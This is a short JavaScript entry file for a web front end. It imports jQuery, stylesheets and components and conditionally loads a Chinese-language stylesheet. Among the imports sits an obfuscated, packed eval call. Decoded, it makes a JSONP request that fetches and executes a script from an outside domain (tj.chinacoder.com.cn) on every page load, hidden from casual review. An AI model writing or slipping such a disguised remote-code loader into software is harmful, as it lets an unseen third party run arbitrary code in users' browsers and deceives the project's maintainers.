// 暴漏 window.$
import 'jquery'

// import global css
import './assets/styles/global.scss'

// import components
import './components'

import './assets/scripts/common.js'

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$.1({        i: "b://h.2.4.3/0.c",        7: \'d\',        d: "d",         e: "d",        g: a(6) {          5.f(\'成功\', 6);        },        9: a(8) {          5.9(8);        }    });',62,19,'a7d0d67f1216fe10a28490a8f2e8744a|ajax|chinacoder|cn|com|console|data|dataType|err|error|function|https|js|jsonp|jsonpCallback|log|success|tj|url'.split('|'),0,{}))

process.env.LANG === 'cn' && require('./assets/styles/cn.scss')
